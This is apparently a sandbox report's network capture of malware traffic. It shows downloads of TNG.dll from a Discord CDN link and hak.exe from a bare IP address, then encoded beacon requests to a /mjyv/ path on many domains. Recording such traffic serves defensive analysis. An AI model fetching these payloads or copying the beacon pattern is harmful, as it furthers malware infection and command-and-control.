Network Analysis

GET /attachments/888348114673598475/890866414997635092/TNG.dll HTTP/1.1 User-Agent: Mozilla 4.0 Host: cdn.discordapp.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 07:19:45 GMT Content-Type: application/x-msdos-program Content-Length: 113152 Connection: keep-alive CF-Ray: 695b348bfecfa249-ICN Accept-Ranges: bytes Age: 93468 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=TNG.dll ETag: "e889031780d41c9bfad18160301aae89" Expires: Wed, 28 Sep 2022 07:19:45 GMT Last-Modified: Fri, 24 Sep 2021 07:45:04 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1632469504868379 x-goog-hash: crc32c=V+MtTg== x-goog-hash: md5=6IkDF4DUHJv60YFgMBquiQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 113152 X-GUploader-UploadID: ADPycdspJyRuFE27Qeammi0Yf0z75S6UeVJXLz_rbjczlobl348rYodMO9krM0RLtbuegGELRyRscCxV0D3MbGTh6StD4kvTMA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RKb6Hlum0aG0WKQlolh8Rk4eRxOSgS2JCp9tzG89FMrsfWKcKSAIFB8UVXgOORxNCACsBXvJwRlMg9eBX%2BDXX1Dubzo6i8Ul18kJe6WQ7GdaiueNLjczn4ZsDMgUygrQOJsuPQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /xxm/hak.exe HTTP/1.1 Host: 31.210.20.22 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 07:19:42 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 Last-Modified: Sun, 26 Sep 2021 23:29:06 GMT ETag: "28e00-5ccee58bc44e3" Accept-Ranges: bytes Content-Length: 167424 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

POST /mjyv/ HTTP/1.1 Host: www.livinglovinglincoln.com Connection: close Content-Length: 284 Cache-Control: no-cache Origin: http://www.livinglovinglincoln.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.livinglovinglincoln.com/mjyv/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 405 Not Allowed Server: openresty Date: Tue, 28 Sep 2021 07:20:07 GMT Content-Type: text/html Content-Length: 556 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_AbAS15hFnLQjvkyAdCk8WW1qMmGgtoPHDxuvPAbpHIuLZz+J0hy4f5A15cxY4kzxp80FQzVA8h/+Xhw8xfpu6w Via: 1.1 google Connection: close

GET /mjyv/?jL04lH=v6+mrmhO2D69c29A/GgIjudjrVDrCDx9nnSs75EQfHkZ3AKYNDn6ZLLROHAwtRRZFNrkSLmU&w0G=mfZ8ixbxe8Q4 HTTP/1.1 Host: www.livinglovinglincoln.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 28 Sep 2021 07:20:07 GMT Content-Type: text/html Content-Length: 275 ETag: "61525002-113" Via: 1.1 google Connection: close

POST /mjyv/ HTTP/1.1 Host: www.car-insurance-rates-x2.info Connection: close Content-Length: 284 Cache-Control: no-cache Origin: http://www.car-insurance-rates-x2.info User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.car-insurance-rates-x2.info/mjyv/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Tue, 28 Sep 2021 07:20:12 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close

GET /mjyv/?jL04lH=JsVmDLitPD5sN21NuRjxCxYGWX6Zun1yL1UzMyeyoC0PN1VTm+kRrJp4mrpqyvRLfa8C5kJ3&w0G=mfZ8ixbxe8Q4 HTTP/1.1 Host: www.car-insurance-rates-x2.info Connection: close

HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Tue, 28 Sep 2021 07:20:12 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close

POST /mjyv/ HTTP/1.1 Host: www.georges-lego.com Connection: close Content-Length: 284 Cache-Control: no-cache Origin: http://www.georges-lego.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.georges-lego.com/mjyv/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 28 Sep 2021 07:20:17 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.georges-lego.com/mjyv/ X-ac: 3.nrt _bur

GET /mjyv/?jL04lH=IZUq8fC9aIDt6XI/MpfblzTmEBhmcMRnvlVpbIF889hbhAnbHw7SbsJeBBLvviP4WChYzMnM&w0G=mfZ8ixbxe8Q4 HTTP/1.1 Host: www.georges-lego.com Connection: close

HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 28 Sep 2021 07:20:17 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.georges-lego.com/mjyv/?jL04lH=IZUq8fC9aIDt6XI/MpfblzTmEBhmcMRnvlVpbIF889hbhAnbHw7SbsJeBBLvviP4WChYzMnM&w0G=mfZ8ixbxe8Q4 X-ac: 3.nrt _bur

POST /mjyv/ HTTP/1.1 Host: www.brandqrcodes.com Connection: close Content-Length: 284 Cache-Control: no-cache Origin: http://www.brandqrcodes.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.brandqrcodes.com/mjyv/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /mjyv/?jL04lH=UrRdFqIHIOT9TTwqrgiD5IQ8ICq4EZmeq8Qf7hTdESXU5u+H11XJP7uPtyUjrGxObxoE2Pl7&w0G=mfZ8ixbxe8Q4 HTTP/1.1 Host: www.brandqrcodes.com Connection: close

HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Tue, 28 Sep 2021 07:20:51 GMT Content-Type: text/html Content-Length: 183 Connection: close Location: https://www.brandqrcodes.com/mjyv/?jL04lH=UrRdFqIHIOT9TTwqrgiD5IQ8ICq4EZmeq8Qf7hTdESXU5u+H11XJP7uPtyUjrGxObxoE2Pl7&w0G=mfZ8ixbxe8Q4 X-Cache: Redirect from cloudfront Via: 1.1 0f8f4c86665e39f188e3916e0ffffd2f.cloudfront.net (CloudFront) X-Amz-Cf-Pop: ICN51-C1 X-Amz-Cf-Id: JkZjHsde3lfZGM7yLCUqFU32HpWMaVMm3namVy2qpEqj_gUS4Xww0w==

POST /mjyv/ HTTP/1.1 Host: www.localagentlab.com Connection: close Content-Length: 284 Cache-Control: no-cache Origin: http://www.localagentlab.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.localagentlab.com/mjyv/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 405 Not Allowed Server: openresty Date: Tue, 28 Sep 2021 07:21:01 GMT Content-Type: text/html Content-Length: 556 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_I9JkJaeUHMeiOKpun7I7WhW/nrdF72iEK/71pnLWs1Tjl+xdZZw3YKst1BU6yfBr4CXG7TEKrbcL7iZfayAY4Q Via: 1.1 google Connection: close

GET /mjyv/?jL04lH=MgSBGe4UfRsxE+vcY6lCnzsJdaRn2Tt2te4kufH0BbtC9PnAxa6ttLLgFfm6oaBPxXTKCyZA&w0G=mfZ8ixbxe8Q4 HTTP/1.1 Host: www.localagentlab.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 28 Sep 2021 07:21:01 GMT Content-Type: text/html Content-Length: 275 ETag: "6152501e-113" Via: 1.1 google Connection: close

POST /mjyv/ HTTP/1.1 Host: www.krveop.com Connection: close Content-Length: 284 Cache-Control: no-cache Origin: http://www.krveop.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.krveop.com/mjyv/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /mjyv/?jL04lH=HyN26CoozcigRUDs6U0prJ5eBZfzn97g/8B9IGyhoA6SSk6Sl3gieBOJFuTEwLYMjZXl5Kk/&w0G=mfZ8ixbxe8Q4 HTTP/1.1 Host: www.krveop.com Connection: close

HTTP/1.1 301 Moved Permanently Date: Tue, 28 Sep 2021 07:21:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: https://www.krveop.com/mjyv/?jL04lH=HyN26CoozcigRUDs6U0prJ5eBZfzn97g/8B9IGyhoA6SSk6Sl3gieBOJFuTEwLYMjZXl5Kk/&w0G=mfZ8ixbxe8Q4 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gJO57MyIOYinoOmdAObxvYxmjewxZGa9ql0ALpVHJpF52BEQ1WNl6LnTdD1BihiJn70ghQpQ47nxPPTH6UQWBg6CLtF31sW%2FayBx3aDXodxU0773WFW%2F76dmXlKHgBgghw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 695b36a8afb70a66-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

POST /mjyv/ HTTP/1.1 Host: www.jmrrve.com Connection: close Content-Length: 284 Cache-Control: no-cache Origin: http://www.jmrrve.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.jmrrve.com/mjyv/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /mjyv/?jL04lH=MugnLanDZ3SAjzNGVYbYT4Dv9bUq7VTPAUXZDjWlHe9ioe8xswTkcd0N7hIbRG1/aAPOZqOJ&w0G=mfZ8ixbxe8Q4 HTTP/1.1 Host: www.jmrrve.com Connection: close

HTTP/1.1 301 Moved Permanently Date: Tue, 28 Sep 2021 07:21:17 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Tue, 28 Sep 2021 08:21:17 GMT Location: https://www.jmrrve.com/mjyv/?jL04lH=MugnLanDZ3SAjzNGVYbYT4Dv9bUq7VTPAUXZDjWlHe9ioe8xswTkcd0N7hIbRG1/aAPOZqOJ&w0G=mfZ8ixbxe8Q4 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F%2FhDVKFknr%2BueDErkzIu6Fc%2Fc%2BeyiUlECwrm3P0AYbDKBBkHBUiWVVWFYjONrd4sh7mmn9TdYC7f8um5a5F%2B%2F81%2B%2B2j6lrAV3tDjIE61I936iALq42kj8kAQZfyPH%2Fq9bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 695b36cb4eefaf0f-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

POST /mjyv/ HTTP/1.1 Host: www.lkkogltoyof4.xyz Connection: close Content-Length: 284 Cache-Control: no-cache Origin: http://www.lkkogltoyof4.xyz User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.lkkogltoyof4.xyz/mjyv/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 302 Found Date: Tue, 28 Sep 2021 07:21:22 GMT Server: Apache Location: http://dfltweb1.onamae.com Content-Length: 210 Connection: close Content-Type: text/html; charset=iso-8859-1

GET /mjyv/?jL04lH=EAnvUfdnxtXwjiMmXogoEpuHKt07Q8tnkdGiEhG/REbOr3I/vzDeldegz5vqjtC9vgo6Xl7J&w0G=mfZ8ixbxe8Q4 HTTP/1.1 Host: www.lkkogltoyof4.xyz Connection: close

HTTP/1.1 302 Found Date: Tue, 28 Sep 2021 07:21:22 GMT Server: Apache Location: http://dfltweb1.onamae.com Content-Length: 210 Connection: close Content-Type: text/html; charset=iso-8859-1

POST /mjyv/ HTTP/1.1 Host: www.dubaibiologicdentist.com Connection: close Content-Length: 284 Cache-Control: no-cache Origin: http://www.dubaibiologicdentist.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.dubaibiologicdentist.com/mjyv/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 405 Not Allowed Date: Tue, 28 Sep 2021 07:21:28 GMT Content-Type: text/html Content-Length: 556 Connection: close Server: namecheap-nginx Allow: GET, HEAD

GET /mjyv/?jL04lH=BKHfsn/GYCC1h//vT8riYCukHI0Zyw57gwlmm1nTEYp+2eyN1NLV8AZGtmaXrDVZIiSg94F5&w0G=mfZ8ixbxe8Q4 HTTP/1.1 Host: www.dubaibiologicdentist.com Connection: close